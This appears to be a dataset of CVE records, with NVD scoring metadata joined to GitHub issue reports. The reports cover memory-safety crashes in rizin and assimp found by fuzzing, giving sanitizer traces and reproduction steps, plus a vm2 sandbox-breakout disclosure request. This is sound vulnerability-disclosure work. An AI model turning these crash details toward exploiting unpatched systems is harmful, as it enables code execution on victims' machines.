`/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-490d344f047c5223f5bfe701dfb406ca2a00710d`
5. You will see the following output (for the first crashing input, the second one is similar):
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2489412==ERROR: AddressSanitizer: SEGV on unknown address 0x6021001ae90f (pc 0x000000d0fdf8 bp 0x7ffde0cc5c90 sp 0x7ffde0cc5ac0 T0)
==2489412==The signal is caused by a WRITE memory access.
#0 0xd0fdf8 in get_complex_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:345:9
#1 0xd0fdf8 in get_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:1083:9
#2 0xd1159a in get_array_object_generic /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:494:9
#3 0xd0dd06 in get_set_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:624:8
#4 0xd0dd06 in get_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:1102:9
#5 0xd0d316 in get_sections_symbols_from_code_objects /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:1197:38
#6 0xb6a06e in symbols /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_pyc.c:129:2
#7 0xae7bf4 in rz_bin_object_set_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:455:16
#8 0xae706b in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:319:2
#9 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19
#10 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8
#11 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18
#12 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23
#13 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4
#14 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14
#15 0x7f4055fa8082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#16 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:345:9 in get_complex_object
==2489412==ABORTING
```
| Multiple heap out-of-bounds writes of size 1 in marshal.c | https://api.github.com/repos/rizinorg/rizin/issues/2963/comments | 1 | 2022-08-22T11:08:29Z | 2022-08-24T00:26:43Z | https://github.com/rizinorg/rizin/issues/2963 | 1,346,224,089 | 2,963 | 4,100 |
CVE-2022-36041 | 2022-09-06T20:15:08.673 | Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when parsing Mach-O files. A user opening a malicious Mach-O file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number 7323e64d68ecccfb0ed3ee480f704384c38676b2 contains a patch. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/7323e64d68ecccfb0ed3ee480f704384c38676b2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2956"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-2c7m-2f37-mr5m"
},
{
"source": "security-advisories@github.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/7323e64d68ecccfb0ed3ee480f704384c38676b2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2956"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-2c7m-2f37-mr5m"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/rizinorg/rizin/issues/2956 | [
"Third Party Advisory"
] | github.com | [
"rizinorg",
"rizin"
] | Hi! We've been fuzzing your project and found the following error in `librz/bin/format/mach0/mach0.c`
### Work environment
OS: Ubuntu 20.04
File format: -
rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9
### Bug description
Heap out-of-bounds write of size 2 in `librz/bin/format/mach0/mach0.c:1612`
### Steps to reproduce
1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .`
2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash`
3. Execute rizin with crashing input (we sent all crashing inputs to you by email):
`/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-6e26c88ac8552738277a17561f1ddcafe3b04e6e`
4. You will see the following output:
```
=================================================================
==2478981==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001af852 at pc 0x000000c5c71d bp 0x7ffdd3ff06f0 sp 0x7ffdd3ff06e8
WRITE of size 2 at 0x6020001af852 thread T0
#0 0xc5c71c in reconstruct_chained_fixup /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:1612:39
#1 0xc5c71c in init_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2041:3
#2 0xc32de1 in init /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2050:7
#3 0xc32de1 in new_buf_64 /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2123:8
#4 0xb3548a in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_mach0.c:47:30
#5 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8
#6 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19
#7 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8
#8 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18
#9 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23
#10 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4
#11 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14
#12 0x7f601eb77082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#13 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d)
0x6020001af852 is located 0 bytes to the right of 2-byte region [0x6020001af850,0x6020001af852)
allocated by thread T0 here:
#0 0x498c9d in malloc (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498c9d)
#1 0xc57e72 in reconstruct_chained_fixup /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:1600:30
#2 0xc57e72 in init_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2041:3
#3 0xc32de1 in init /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2050:7
#4 0xc32de1 in new_buf_64 /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2123:8
#5 0xb3548a in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_mach0.c:47:30
#6 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:1612:39 in reconstruct_chained_fixup
Shadow bytes around the buggy address:
0x0c048002deb0: fa fa 06 fa fa fa 00 03 fa fa 06 fa fa fa 00 03
0x0c048002dec0: fa fa 06 fa fa fa 00 03 fa fa 06 fa fa fa 00 03
0x0c048002ded0: fa fa 06 fa fa fa 00 03 fa fa 06 fa fa fa 00 03
0x0c048002dee0: fa fa 06 fa fa fa 06 fa fa fa 06 fa fa fa 00 00
0x0c048002def0: fa fa 06 fa fa fa 00 05 fa fa 06 fa fa fa fd fa
=>0x0c048002df00: fa fa 00 04 fa fa 00 02 fa fa[02]fa fa fa fa fa
0x0c048002df10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002df20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002df30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002df40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002df50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2478981==ABORTING
```
| Heap out-of-bounds write in mach0.c | https://api.github.com/repos/rizinorg/rizin/issues/2956/comments | 2 | 2022-08-22T10:50:17Z | 2022-08-24T00:26:44Z | https://github.com/rizinorg/rizin/issues/2956 | 1,346,201,672 | 2,956 | 4,101 |
CVE-2022-36043 | 2022-09-06T20:15:08.740 | Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to a double free in bobj.c:rz_bin_reloc_storage_free() when freeing relocations generated from qnx binary plugin. A user opening a malicious qnx binary could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number a3d50c1ea185f3f642f2d8180715f82d98840784 contains a patch for this issue. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/a3d50c1ea185f3f642f2d8180715f82d98840784"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2964"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-rjhv-mj4g-j4p5"
},
{
"source": "security-advisories@github.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/a3d50c1ea185f3f642f2d8180715f82d98840784"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2964"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-rjhv-mj4g-j4p5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"415"
] | 415 | https://github.com/rizinorg/rizin/issues/2964 | [
"Third Party Advisory"
] | github.com | [
"rizinorg",
"rizin"
] | Hi! We've been fuzzing your project and found the following error in `librz/bin/bobj.c:142`
### Work environment
OS: Ubuntu 20.04
File format: -
rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9
### Bug description
Heap double-free in `librz/bin/bobj.c:142:3`
### Steps to reproduce
1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .`
2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash`
3. Execute rizin with crashing input (we sent all crashing inputs to you by email):
`/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-ec0c253b75cf3a89faf1b217cb8f94463852493c`
4. You will see the following output:
```
=================================================================
==2491485==ERROR: AddressSanitizer: attempting double-free on 0x60600003fa40 in thread T0:
#0 0x498a32 in free (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498a32)
#1 0xae69c3 in rz_bin_reloc_storage_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:142:3
#2 0xae69c3 in rz_bin_object_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:201:2
#3 0xad73c7 in rz_bin_file_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:64:2
#4 0x4fcf7a in rz_list_delete /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:166:3
#5 0x4fcf7a in rz_list_purge /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:126:3
#6 0x4fcf7a in rz_list_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:139:3
#7 0xadffdd in rz_bin_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:449:2
#8 0x10254a9 in rz_core_fini /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/core.c:2658:2
#9 0x1025b48 in rz_core_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/core.c:2684:2
#10 0x5b6ac6 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1503:2
#11 0x7fe47324a082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#12 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d)
0x60600003fa40 is located 0 bytes inside of 64-byte region [0x60600003fa40,0x60600003fa80)
freed by thread T0 here:
#0 0x498a32 in free (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498a32)
#1 0x4fcf7a in rz_list_delete /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:166:3
#2 0x4fcf7a in rz_list_purge /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:126:3
#3 0x4fcf7a in rz_list_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:139:3
previously allocated by thread T0 here:
#0 0x498e12 in calloc (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498e12)
#1 0xb6b102 in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_qnx.c:131:22
#2 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8
SUMMARY: AddressSanitizer: double-free (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498a32) in free
==2491485==ABORTING
```
| double-free in bobj.c | https://api.github.com/repos/rizinorg/rizin/issues/2964/comments | 2 | 2022-08-22T11:11:15Z | 2022-08-24T00:26:42Z | https://github.com/rizinorg/rizin/issues/2964 | 1,346,227,624 | 2,964 | 4,102 |
CVE-2022-36067 | 2022-09-06T22:15:09.207 | vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11 of vm2. There are no known workarounds. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/issues/467"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20221017-0002/"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/issues/467"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20221017-0002/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3CB151FD-32BF-4CED-93D3-F07D6F62E4DC",
"versionEndExcluding": "3.9.11",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"913"
] | 913 | https://github.com/patriksimek/vm2/issues/467 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"patriksimek",
"vm2"
] | Hello 👋
The [Oxeye](https://www.oxeye.io/) research team has found a sandbox breakout vulnerability in VM2. We would like to share the in-depth analysis with you so the vulnerability can be fixed. We tried to contact `security@integromat.com` but didn't get any response.
Could you please share with me an email address to keep the issue private?
Best,
Oxeye Research Team | Sandbox Breakout in VM2 | https://api.github.com/repos/patriksimek/vm2/issues/467/comments | 18 | 2022-08-28T09:52:15Z | 2022-09-15T02:53:51Z | https://github.com/patriksimek/vm2/issues/467 | 1,353,303,106 | 467 | 4,103 |
CVE-2022-38528 | 2022-09-06T23:15:08.880 | Open Asset Import Library (assimp) commit 3c253ca was discovered to contain a segmentation violation via the component Assimp::XFileImporter::CreateMeshes. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/assimp/assimp/issues/4662"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/assimp/assimp/issues/4662"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:assimp:assimp:5.2.5:*:*:*:*:*:*:*",
"matchCriteriaId": "19513059-3423-47C9-B7A3-38B8ACA2A7B2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/assimp/assimp/issues/4662 | [
"Exploit",
"Issue Tracking",
"Technical Description",
"Third Party Advisory"
] | github.com | [
"assimp",
"assimp"
] | # Describe the bug
SEGV on unknown address still exists in Assimp::XFileImporter::CreateMeshes.
***This is similar to issue https://github.com/assimp/assimp/issues/1728. Note that #1728 reported wrong type of the vulnerability, as it is not a NULL pointer dereference. Patch https://github.com/assimp/assimp/commit/39ce3e1309b50681ea24b3109971582003fa83d5 was misguided by #1728, leaving this vulnerability unfixed.***
# To Reproduce
Steps to reproduce the behavior:
**version:** latest commit https://github.com/assimp/assimp/commit/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac
**poc:**[null_CreateMeshes.zip](https://github.com/assimp/assimp/files/9190065/null_CreateMeshes.zip)
```
git clone https://github.com/assimp/assimp.git
cd assimp
mkdir build
cd build
CFLAGS="-g -O0" CXXFLAGS="-g -O0" cmake -G "Unix Makefiles" -DBUILD_SHARED_LIBS=OFF -DASSIMP_BUILD_ASSIMP_TOOLS=ON ..
./assimp info $POC
```
# Expected behavior
```
user@c3ae4d510abb:$ ./bin/assimp info poc
Launching asset import ... OK
Validating postprocessing flags ... OK
0 %
Segmentation fault (core dumped)
```
```
user@c3ae4d510abb:$ ./bin/assimp info poc
Launching asset import ... OK
Validating postprocessing flags ... OK
0 %
AddressSanitizer:DEADLYSIGNAL
=================================================================
==20088==ERROR: AddressSanitizer: SEGV on unknown address 0x6120000301c0 (pc 0x555556872ed9 bp 0x7fffffffb4d0 sp 0x7fffffffb100 T0)
==20088==The signal is caused by a READ memory access.
#0 0x555556872ed8 (bin/assimp+0x131eed8)
#1 0x55555687151a (bin/assimp+0x131d51a)
#2 0x5555568716a0 (bin/assimp+0x131d6a0)
#3 0x555556870ba0 (bin/assimp+0x131cba0)
#4 0x555556870829 (bin/assimp+0x131c829)
#5 0x555555c56ab5 (bin/assimp+0x702ab5)
#6 0x55555580ecf2 (bin/assimp+0x2bacf2)
#7 0x5555557f89af (bin/assimp+0x2a49af)
#8 0x5555557f5f42 (bin/assimp+0x2a1f42)
#9 0x555555801399 (bin/assimp+0x2ad399)
#10 0x5555557f59c8 (bin/assimp+0x2a19c8)
#11 0x7ffff7070082 (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
#12 0x5555557cda7d (bin/assimp+0x279a7d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (bin/assimp+0x131eed8)
==20088==ABORTING
Aborted
```
# Vulnerability analysis
